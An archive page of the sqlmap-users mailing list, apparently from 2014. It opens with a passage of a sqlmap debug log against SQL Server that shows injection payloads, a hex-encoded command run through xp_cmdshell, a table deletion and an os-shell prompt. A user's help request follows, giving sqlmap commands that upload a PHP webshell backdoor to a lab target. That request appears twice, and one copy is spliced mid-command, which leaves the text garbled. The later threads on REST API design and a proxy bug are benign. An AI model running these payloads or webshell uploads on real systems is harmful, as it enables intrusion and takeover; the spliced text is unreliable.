@wgiw=0x64656c202f46202f5120443a5c4d6963726f736f66742053514c205365727665725c4d5353514c31305f35302e4d5353514c5345525645525c4d5353514c5c4c6f675c746d70636f6974652e747874;EXEC
master..xp_cmdshell @wgiw')--
[03:59:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: SQL Server blocked access to STATEMENT
'OpenRowset/OpenDatasource' of component 'Ad Hoc Distributed Queries'
because this component is turned off as part of the security configuration
for this server. A system administrator can enable the use of 'Ad Hoc
Distributed Queries' by using sp_configure. For more information about
enabling 'Ad Hoc Distributed Queries', see "Surface Area Configuration" in
SQL Server Books Online.'
[03:59:07] [PAYLOAD] f') AND 9097=CONVERT(INT,(SELECT
CHAR(113)+CHAR(115)+CHAR(103)+CHAR(106)+CHAR(113)+(SELECT
ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput)+CHAR(113)+CHAR(121)+CHAR(119)+CHAR(117)+CHAR(113))) AND
('tzMl' LIKE 'tzMl
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.Data.SqlClient.SqlException: Conversion failed when converting the
nvarchar value 'qsgjq0qywuq' to data type int.'
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>51 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>54 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>56 AND ('EirG' LIKE 'EirG
[03:59:07] [PAYLOAD] f') AND UNICODE(SUBSTRING((SELECT
ISNULL(CAST(COUNT(id) AS NVARCHAR(4000)),CHAR(32)) FROM
sqlmapoutput),1,1))>57 AND ('EirG' LIKE 'EirG
[03:59:07] [INFO] retrieved:
[03:59:07] [DEBUG] performed 4 queries in 0.38 seconds
[03:59:07] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>51) WAITFOR DELAY
'0:0:5'--
[03:59:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:07] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:07] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>48) WAITFOR DELAY
'0:0:5'--
[03:59:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:08] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[03:59:08] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>1) WAITFOR DELAY
'0:0:5'--
[03:59:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[03:59:13] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[04:00:34] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))>47) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),1,1))!=48) WAITFOR DELAY
'0:0:5'--
[04:00:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:39] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:39] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>51) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>48) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [PAYLOAD] f') IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(COUNT(id)
AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput),2,1))>1) WAITFOR DELAY
'0:0:5'--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [INFO] retrieved: 0
[04:00:40] [DEBUG] performed 8 queries in 92.65 seconds
[04:00:40] [PAYLOAD] f');DELETE FROM sqlmapoutput--
[04:00:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:00:40] [WARNING] parsed DBMS error message:
'System.NullReferenceException: Object reference not set to an instance of
an object.'
[04:00:40] [ERROR] it seems that the temporary directory ('D:/Microsoft SQL
Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log') used for storing console output
within the back-end file system does not have writing permissions for the
DBMS process. You are advised to manually adjust it with option --tmp-path
switch or you will not be able to retrieve the commands output
[04:00:40] [INFO] going to use xp_cmdshell extended procedure for operating
system command execution
[04:00:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and
press ENTER
os-shell> x
|
|
From: Brian O. <br...@hu...> - 2014-03-21 03:44:51
|
Hello Everyone, I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/). I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice....I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server." Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special? Here's the output: root@kali:/usr/share/sqlmap# sqlmap -u " http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 ... [*] starting at 23:13:08 [23:13:08] [DEBUG] cleaning up configuration parameters [23:13:08] [DEBUG] setting the HTTP timeout [23:13:08] [DEBUG] setting the HTTP method to GET [23:13:08] [DEBUG] creating HTTP requests opener object [23:13:08] [DEBUG] forcing back-end DBMS to user defined value [23:13:08] [DEBUG] setting the write file functionality [23:13:08] [INFO] testing connection to the target URL [23:13:08] [DEBUG] declared web page charset 'utf-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- [23:13:08] [INFO] testing MySQL [23:13:08] [INFO] confirming MySQL [23:13:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [23:13:08] [INFO] fingerprinting the back-end DBMS operating system [23:13:08] [INFO] the back-end DBMS operating system is Windows [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138' [*] shutting down at 23:13:08 The results are the same when the cmdline is changed up for a POST version: root@kali:/usr/share/sqlm Hello Everyone, I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/). I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice....I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server." Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special? Here's the output: root@kali:/usr/share/sqlmap# sqlmap -u " http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 ... [*] starting at 23:13:08 [23:13:08] [DEBUG] cleaning up configuration parameters [23:13:08] [DEBUG] setting the HTTP timeout [23:13:08] [DEBUG] setting the HTTP method to GET [23:13:08] [DEBUG] creating HTTP requests opener object [23:13:08] [DEBUG] forcing back-end DBMS to user defined value [23:13:08] [DEBUG] setting the write file functionality [23:13:08] [INFO] testing connection to the target URL [23:13:08] [DEBUG] declared web page charset 'utf-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- [23:13:08] [INFO] testing MySQL [23:13:08] [INFO] confirming MySQL [23:13:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [23:13:08] [INFO] fingerprinting the back-end DBMS operating system [23:13:08] [INFO] the back-end DBMS operating system is Windows [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138' [*] shutting down at 23:13:08 The results are the same when the cmdline is changed up for a POST version: root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 Any thoughts on what may be happening here would be much appreciated. Thanks, Brian ap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 Any thoughts on what may be happening here would be much appreciated. Thanks, Brian |
|
From: Miroslav S. <mir...@gm...> - 2014-03-20 19:05:33
|
Great reply :) Bye On Mar 20, 2014 4:13 PM, "Brandon Perry" <bpe...@gm...> wrote: > I can't comment on building the API, but I maintain C# bindings to the > sqlmap REST API and, programmatically, it works really well. > > There is no authentication, but I only ever run it on localhost anyway so > this isn't a big deal to me. > > I have tested it under relatively heavy load (one API instance testing > multiple applications) and it has been performant. I don't recall ever > saying "Man, I wish this were faster". > > JSON is totally the way to go for data requests/responses. > > One recommendation I have since I deal with many APIs on a daily basis is > please don't assume the programmers will be interacting with your API with > language X. The Metasploit MSGPACK API is a good example of this and is > very cumbersome to use from a strongly typed language. Arachni falls into a > similar field relying on Ruby-style marshalling or YAML which I simply > can't do from, say, C#. > > Aside from sqlmap, I also really like the cuckoo-sandbox API. > > > > On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm... > > wrote: > >> List, >> >> I'm going to abuse the list a little bit, and poke your brains for >> a while, so be prepared :) >> >> The w3af project wants to implement its own REST API to expose the >> w3afCore and KnowledgeBase objects. The core allows users to configure >> the plugins and start the scan, and the knowledge base holds the >> vulnerabilities. >> >> You guys implemented a REST API for sqlmap, which has been up and >> running for a while now. >> >> What I wanted to know is: >> * What's the technology stack you guys used for creating the REST >> API? >> * Were you happy with it? Would you use something different if >> you had the chance? >> * Have you tested the API under heavy load? >> * Do you have the concept of sessions and users in the API? Why >> not? >> * Any recommendations on API design? (paths, results, hrefs, etc.) >> >> Thanks! >> >> Regards, >> -- >> Andrés Riancho >> Project Leader at w3af - http://w3af.org/ >> Web Application Attack and Audit Framework >> Twitter: @w3af >> GPG: 0x93C344F3 >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Andres R. <and...@gm...> - 2014-03-20 15:32:25
|
Thanks for your input Brandon, very useful! On Thu, Mar 20, 2014 at 12:12 PM, Brandon Perry <bpe...@gm...> wrote: > I can't comment on building the API, but I maintain C# bindings to the > sqlmap REST API and, programmatically, it works really well. > > There is no authentication, but I only ever run it on localhost anyway so > this isn't a big deal to me. > > I have tested it under relatively heavy load (one API instance testing > multiple applications) and it has been performant. I don't recall ever > saying "Man, I wish this were faster". > > JSON is totally the way to go for data requests/responses. > > One recommendation I have since I deal with many APIs on a daily basis is > please don't assume the programmers will be interacting with your API with > language X. The Metasploit MSGPACK API is a good example of this and is very > cumbersome to use from a strongly typed language. Arachni falls into a > similar field relying on Ruby-style marshalling or YAML which I simply can't > do from, say, C#. > > Aside from sqlmap, I also really like the cuckoo-sandbox API. > > > > On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm...> > wrote: >> >> List, >> >> I'm going to abuse the list a little bit, and poke your brains for >> a while, so be prepared :) >> >> The w3af project wants to implement its own REST API to expose the >> w3afCore and KnowledgeBase objects. The core allows users to configure >> the plugins and start the scan, and the knowledge base holds the >> vulnerabilities. >> >> You guys implemented a REST API for sqlmap, which has been up and >> running for a while now. >> >> What I wanted to know is: >> * What's the technology stack you guys used for creating the REST >> API? >> * Were you happy with it? Would you use something different if >> you had the chance? >> * Have you tested the API under heavy load? >> * Do you have the concept of sessions and users in the API? Why >> not? >> * Any recommendations on API design? (paths, results, hrefs, etc.) >> >> Thanks! >> >> Regards, >> -- >> Andrés Riancho >> Project Leader at w3af - http://w3af.org/ >> Web Application Attack and Audit Framework >> Twitter: @w3af >> GPG: 0x93C344F3 >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Brandon P. <bpe...@gm...> - 2014-03-20 15:12:48
|
I can't comment on building the API, but I maintain C# bindings to the sqlmap REST API and, programmatically, it works really well. There is no authentication, but I only ever run it on localhost anyway so this isn't a big deal to me. I have tested it under relatively heavy load (one API instance testing multiple applications) and it has been performant. I don't recall ever saying "Man, I wish this were faster". JSON is totally the way to go for data requests/responses. One recommendation I have since I deal with many APIs on a daily basis is please don't assume the programmers will be interacting with your API with language X. The Metasploit MSGPACK API is a good example of this and is very cumbersome to use from a strongly typed language. Arachni falls into a similar field relying on Ruby-style marshalling or YAML which I simply can't do from, say, C#. Aside from sqlmap, I also really like the cuckoo-sandbox API. On Thu, Mar 20, 2014 at 10:00 AM, Andres Riancho <and...@gm...>wrote: > List, > > I'm going to abuse the list a little bit, and poke your brains for > a while, so be prepared :) > > The w3af project wants to implement its own REST API to expose the > w3afCore and KnowledgeBase objects. The core allows users to configure > the plugins and start the scan, and the knowledge base holds the > vulnerabilities. > > You guys implemented a REST API for sqlmap, which has been up and > running for a while now. > > What I wanted to know is: > * What's the technology stack you guys used for creating the REST > API? > * Were you happy with it? Would you use something different if > you had the chance? > * Have you tested the API under heavy load? > * Do you have the concept of sessions and users in the API? Why > not? > * Any recommendations on API design? (paths, results, hrefs, etc.) > > Thanks! > > Regards, > -- > Andrés Riancho > Project Leader at w3af - http://w3af.org/ > Web Application Attack and Audit Framework > Twitter: @w3af > GPG: 0x93C344F3 > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Andres R. <and...@gm...> - 2014-03-20 15:01:27
|
List,
I'm going to abuse the list a little bit, and poke your brains for
a while, so be prepared :)
The w3af project wants to implement its own REST API to expose the
w3afCore and KnowledgeBase objects. The core allows users to configure
the plugins and start the scan, and the knowledge base holds the
vulnerabilities.
You guys implemented a REST API for sqlmap, which has been up and
running for a while now.
What I wanted to know is:
* What's the technology stack you guys used for creating the REST API?
* Were you happy with it? Would you use something different if
you had the chance?
* Have you tested the API under heavy load?
* Do you have the concept of sessions and users in the API? Why not?
* Any recommendations on API design? (paths, results, hrefs, etc.)
Thanks!
Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Dirk W. <sp...@dr...> - 2014-03-18 16:23:55
|
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<div class="moz-cite-prefix">Am 03/18/2014 04:43 PM, schrieb
Miroslav Stampar:<br>
</div>
<blockquote
cite="mid:CA+...@ma..."
type="cite">
<div dir="ltr">Hi Dirk.
<div><br>
</div>
<div>Thank you for your report and find it fixed now [1].</div>
</div>
</blockquote>
<br>
thx, Miroslav. Wow, 39 minutes for the fix! :-)<br>
<br>
Cheers, Dirk<br>
<br>
<blockquote
cite="mid:CA+...@ma..."
type="cite">
<div dir="ltr">
<div><br>
</div>
<div>Kind regards,</div>
<div>Miroslav Stampar</div>
<div><br>
</div>
<div>[1] <a moz-do-not-send="true"
href="https://github.com/sqlmapproject/sqlmap/issues/644">https://github.com/sqlmapproject/sqlmap/issues/644</a></div>
</div>
<div class="gmail_extra"><br>
<br>
<div class="gmail_quote">On Tue, Mar 18, 2014 at 4:04 PM, Dirk
Wetter <span dir="ltr"><<a moz-do-not-send="true"
href="mailto:sp...@dr..." target="_blank">sp...@dr...</a>></span>
wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0
.8ex;border-left:1px #ccc solid;padding-left:1ex">Hi there,<br>
<br>
is that only me? The option above doesn't work with 97f603a
,<br>
it connects to my proxy.<br>
<br>
Using a previous version does do the trick.<br>
<br>
Am I missing something?<br>
<br>
Cheers,<br>
<br>
Dirk<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
------------------------------------------------------------------------------<br>
Learn Graph Databases - Download FREE O'Reilly Book<br>
"Graph Databases" is the definitive new guide to graph
databases and their<br>
applications. Written by three acclaimed leaders in the
field,<br>
this first edition is now available. Download your free book
today!<br>
<a moz-do-not-send="true"
href="http://p.sf.net/sfu/13534_NeoTech" target="_blank">http://p.sf.net/sfu/13534_NeoTech</a><br>
_______________________________________________<br>
sqlmap-users mailing list<br>
<a moz-do-not-send="true"
href="mailto:sql...@li...">sql...@li...</a><br>
<a moz-do-not-send="true"
href="https://lists.sourceforge.net/lists/listinfo/sqlmap-users"
target="_blank">https://lists.sourceforge.net/lists/listinfo/sqlmap-users</a><br>
</blockquote>
</div>
<br>
<br clear="all">
<div><br>
</div>
-- <br>
Miroslav Stampar<br>
<a moz-do-not-send="true" href="http://about.me/stamparm"
target="_blank">http://about.me/stamparm</a>
</div>
</blockquote>
<br>
</body>
</html>
|
|
From: Miroslav S. <mir...@gm...> - 2014-03-18 15:44:00
|
Hi Dirk. Thank you for your report and find it fixed now [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/644 On Tue, Mar 18, 2014 at 4:04 PM, Dirk Wetter <sp...@dr...> wrote: > Hi there, > > is that only me? The option above doesn't work with 97f603a , > it connects to my proxy. > > Using a previous version does do the trick. > > Am I missing something? > > Cheers, > > Dirk > > > > > > > > > > > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Dirk W. <sp...@dr...> - 2014-03-18 15:18:47
|
Hi there, is that only me? The option above doesn't work with 97f603a , it connects to my proxy. Using a previous version does do the trick. Am I missing something? Cheers, Dirk |
48 messages has been excluded from this view by a project administrator.
